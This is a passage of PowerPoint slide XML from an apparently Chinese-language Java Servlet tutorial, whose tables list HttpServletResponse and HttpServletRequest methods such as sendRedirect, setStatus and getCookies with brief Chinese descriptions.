                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>boolean isCommitted()</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返回响应是否已经提交到客户端</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461322">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addCookie(Cookie cookie)</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添加指定的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>至响应中</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461322">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flushBuffer()</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将任何缓存中的内容写入客户端</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461322">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reset()</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清除任何缓存中的任何数据，包括状态码和各种响应头</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461322">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resetBuffer()</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清除基本的缓存数据，不包括响应头和状态码</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675434">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sendError(int sc)</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使用指定的状态码向客户端发送一个出错响应，然后清除缓存</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461322">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sendError(int sc, String msg)</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使用指定的状态码和消息向客户端发送一个出错响应</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461322">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>void </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>sendRedirect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(String location)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>使用指定的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>URL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>向客户端发送一个临时的间接响应</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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9EDF4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5997895" y="1972148"/>
          <a:ext cx="4759405" cy="4197155"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4759405"/>
              </a:tblGrid>
              <a:tr h="467099">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>方法</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>描述</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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F81BD"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="499731">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setBufferSize(int size)</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设置响应体的缓存区大小</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499731">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setCharacterEncoding(String charset)</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指定响应的编码集（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>MIME</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字符集），例如</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>UTF-8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">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731670">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setContentLength(int len)</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指定</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>HTTP servlets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>中响应的内容的长度，此方法用来设置 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>HTTP Content-Length </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>信息头</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499731">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setContentType(String type)</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设置响应的内容的类型，如果响应还未被提交的话</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499731">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setHeader(String name, String value)</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使用指定名称和值设置响应头的名称和内容</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499731">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>void setIntHeader(String name, int value)</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使用指定名称和值设置响应头的名称和内容</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499731">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>void </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>setStatus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(int </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>设置响应的状态码</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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0D8E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921589" y="1455410"/>
            <a:ext cx="4134092" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="797573" y="2232143"/>
          <a:ext cx="4827723" cy="3899915"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4827723"/>
              </a:tblGrid>
              <a:tr h="353645">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>方法</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>描述</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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F81BD"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Cookie[] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>getCookies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回客户端所有的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>的数组</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Enumeration getAttributeNames()</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返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>对象的所有属性名称的集合</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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Enumeration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>getHeaderNames</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回所有</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>头的名称集合</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Enumeration getParameterNames()</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返回请求中所有参数的集合</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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>getAttribute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(String name)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回名称为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>的属性值，如果不存在则返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>null。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>String </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>getCharacterEncoding</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
